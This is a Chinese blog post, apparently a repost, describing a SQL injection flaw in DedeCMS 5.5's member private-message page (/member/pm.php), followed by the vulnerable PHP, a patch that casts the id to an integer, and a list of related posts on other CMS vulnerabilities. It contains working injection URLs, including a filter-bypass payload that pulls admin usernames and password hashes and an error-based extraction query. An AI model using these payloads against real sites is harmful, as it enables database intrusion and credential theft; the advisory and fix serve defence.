医疗保险 member.php,dedecms /member/pm.php 会员中心注入漏洞及解决方案

最新推荐文章于 2021-04-09 07:56:04 发布
最新推荐文章于 2021-04-09 07:56:04 发布
阅读量137 收藏
点赞数
文章标签: 医疗保险 member.php

Dedecms SQL注入 漏洞分析 防御措施 会员中心
关键词由CSDN通过智能技术生成

1. 漏洞描述

Dedecms会员中心注入漏洞

2. 漏洞触发条件

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

如果报错: Safe Alert: Request Error step 1 !

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

报错注入

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

3. 漏洞代码分析

/member/pm.phpelse if($dopost=='read')

{

$sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";

$friends = array();

$dsql->SetQuery($sql);

$dsql->Execute();

while ($row = $dsql->GetArray())

{

$friends[] = $row;

}

//$id注入

$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤

if(!is_array($row))

{

ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');

exit();

}

//$id注入

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");

include_once(dirname(__FILE__).'/templets/pm-read.htm');

exit();

}

4. 防御方法

/member/pm.phpelse if($dopost=='read')

{

$sql = "Select * From `#@__member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";

$friends = array();

$dsql->SetQuery($sql);

$dsql->Execute();

while ($row = $dsql->GetArray())

{

$friends[] = $row;

}

/* $id过滤 */

$id = intval($id);

/* */

$row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");

if(!is_array($row))

{

ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');

exit();

}

$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");

$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");

include_once(dirname(__FILE__).'/templets/pm-read.htm');

exit();

}

5.补丁下载:

weixin_39756445
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Format(s) 1080P高清,720P高清are missing;you have to login or become premium member to download them 解决方案
weixin_43178406的博客
06-30 6万+
本文主要介绍了Format(s) 1080P高清,720P高清are missing;you have to login or become premium member to download them 解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
error: ‘PyArray_Descr {aka struct _PyArray_Descr } ‘ has no member named ‘elsize‘解决方案
最新发布
weixin_43178406的博客
07-25 3万+
本文主要介绍了error: 'PyArray_Descr {aka struct _PyArray_Descr } ’ has no member named 'elsize’解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
DedeCMS v5.7 注册用户任意文件删除漏洞 /member/inc/archives_check_edit.php
qq_31763129的博客
04-26 2046
漏洞名称:DedeCMS v5.7 注册用户任意文件删除漏洞  危险等级:★★★★★(高危)  漏洞文件:/member/inc/archives_check_edit.php  披露时间:2017-03-20  漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。  修复方法:  打开/member/inc/archives_check_edit.php  找到大概第92行的代码:$litpic...
member pm.php,Dedecms 会员中心注入漏洞5
weixin_31995251的博客
04-09 134
漏洞作者: Matt[php]member/pm.phpelse if($dopost=='read'){$sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";$friends = array();$dsq...
member.ctrl.php漏洞,shopex ctl.member.php文件SQL注入漏洞漏洞预警 -电脑资料
weixin_33178839的博客
03-12 368
又是sql注入漏洞 测试版本:shopex-singel-4.8.5.78660文件:\core\shop\controller\ctl.member.phpfunction delTrackMsg() { if(!empty($_POST['deltrack'])){ $oMsg = &$this->system->loadModel('resources/msgbox');...
MySQL相关知识整理
Jeromeyoung
12-13 832
文章目录前言第一章 MySQL是什么?第二章 数据库的五个基本单位第三章 Mysql连接数据库第四章 Mysql数据库操作一、创建数据库二、查看数据库三、选中数据库四、查看数据库中的表五、删除数据库第五章 Mysql数据表操作一、创建表二、查看表字段结构信息三、查看表创建语句四、删除表五、指定表引擎和字符集第六章 Mysql数据字段操作一、查看表结构二、修改表字段类型 modify三、增加表字段四、删除表字段五、表字段改名六、修改表字段排列顺序七、修改表名第七章 Mysql数据类型第八章 Mysql字符.
PHP之用户验证和标签推荐的简单使用
weixin_33797791的博客
10-29 182
本篇主要是讲解一些最简单的验证知识 效果图 bookmark_fns.php <?php require_once('output_fns.php'); require_once('db_fns.php'); require_once('data_valid_fns.php'); require_once('url_fns.php'); require_once('user_auth_...
m.555lu.co/vlist.php_新浪微博V2接口演示程序-Powered by Sina App Engine
weixin_39823299的博客
12-22 1万+
From 074a730042679675bd13da3d5bdd64cf901af781 Mon Sep 17 00:00:00 2001From: Elmer Zhang Date: Mon, 12 Nov 2012 15:05:48 +0800Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E7=9B=AE=E5=BD=95=E7=BB=93?==...
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
【ERORR未解决】npm ERR! request to https://registry.npmjs.org/composer-runtime-hlfv1 failed, reason: unab
qq_38904077的博客
05-02 4814
尝试js遇到问题,开了一个v2版本的换了一些东西准备跑一下试试看,遇到错误。 它尝试启动一个ccenv但是没有启动成功。 然后报错,错误信息如下: 错误描述 cielo@cielo-ThinkPad-E550:~/cprogrames/csupplychainv2/dist$ composer network start -n csupplychainv2 -c PeerAdmin@hlfv1 -...
DEDECMS 漏洞汇总
weixin_30527551的博客
08-08 6713
日期:2019-08-08 10:20:28 更新: 作者:Bay0net 介绍: 0x01、组合拳拿 shell 漏洞版本:v5.5 - v5.7 前台任意用户密码重置 首先注册一个账户,账户名为 0000001,此处注册的账户,前面是多个 0,后面是 1 就行。 注册链接: http://192.168.31.59/member/index_do.php?fmd...
猜测 member.php,PHPMPS v2.3 /member.php SQL注入漏洞
weixin_30301989的博客
03-10 378
/member.phpcase 'send':$paycenter = trim($_POST['paycenter']);$contactname = trim($_POST['contactname']);$telephone = trim($_POST['telephone']);$email = trim($_POST['email']);$username = trim($_POST['...
购物 member.php,PHP 实现机器学习挖掘用户的购物习惯
weixin_39682697的博客
03-16 127
开场白经常听说某某某专攻机器学习的程序猿的年薪百万,AI 更是火得不得了,提起这些基本都是 Python 、Java、Go、甚至 JavaScript 都有就是没有我们 PHP 什么事,这我就不服我了啊。毕竟PHP 是世界上最好的语言虽然 PHP 的生态导致无法落地机器学习,但还是可以做一些简单的数据分析工作的。安装这里推荐 php-ml 这个库,其中包含各种算法,交叉验证,神经网络,预处理,特征...
通达OA低版本文件上传+apache解析漏洞getshell
谢公子的博客
05-12 1975
目录 漏洞文件 漏洞利用条件 漏洞复现 漏洞文件 /general/vmeet/privateUpload.php 漏洞利用条件 通达OA低版本 apache存在解析漏洞 漏洞复现 测试环境:通达OA 2008,apache存在解析漏洞 首先访问是否存在该文件 存在的话,将下面代码保存后缀为1.html文件,然后将木马命名为 aaa.php.1,与1.html在同一个目录下 <form id="frmUpload" enctype="multipart/for..
discuz 修改member.php,member_getpasswd.php这是什么文件。发现被修改过。
weixin_34093995的博客
03-19 1258
/*** [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms** $Id: member_getpasswd.php 35030 2014-10-23 07:43:23Z laoguozhang $*/if(!defined('IN_D...
dedecms漏洞组合拳拿站(渗透笔记)
一个安全研究员
07-13 1万+
如题
PHP+Mysql 实现用户登录,注册界面
小锤队长的博客
07-28 3万+
目标: 实现用户的登录 、注册 、修改密码、重置密码、添加书签,显示书签,删除书签 等功能 进一步目标: 实现对 用户输入信息的控制,具体表现在 对注册信息、登录信息的 的过滤,具有简单的防sql注入的功能 首先明确结构:把自定义的函数集中放在两个脚本 bm_functions.php 和 output_functions.php 中 完成后的各个界面: 登录界面: 注册界...
httpmember.php,PHPMyWind 5.1 /member.php 远程密码修改漏洞
weixin_31283549的博客
03-12 631
/member.php//初始化参数……$id = isset($id) ? intval($id) : 0;……//更新资料else if($a == 'saveedit'){//检测数据完整性if($password!=$repassword or $email==''){header('location:?c=edit');exit();}//HTML转义变量....//检测旧密码是否正确i...
php用户管理系统(简单)学习教程
虾米大王的学习历程
03-27 1万+
最近因为工作原因需要使用php开发网页,所以开始学习php,在学习的过程中也遇到了很多困难,经过不断的查询百度各种学习资料,逐步的客服了这些困难和疑惑,现在我将学习过程中编写的代码分享给有需要的朋友,仅供参考。 此系统比较简单,基本含有了用户管理系统的注册、登录、修改资料、找回密码等功能,共14个php页面,分别为conn.php(数据库连接),index.php(首页),chkuser.php...
php discuzSQL注入_Discuz 7.2 /search.php SQL注入漏洞
05-24
Discuz 7.2 版本的 search.php 存在 SQL 注入漏洞。 攻击者可以通过构造特定的搜索参数,向数据库中插入恶意代码。例如,以下 URL 将会向 discuz 数据库中的 pre_common_member 表中插入一条数据: ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值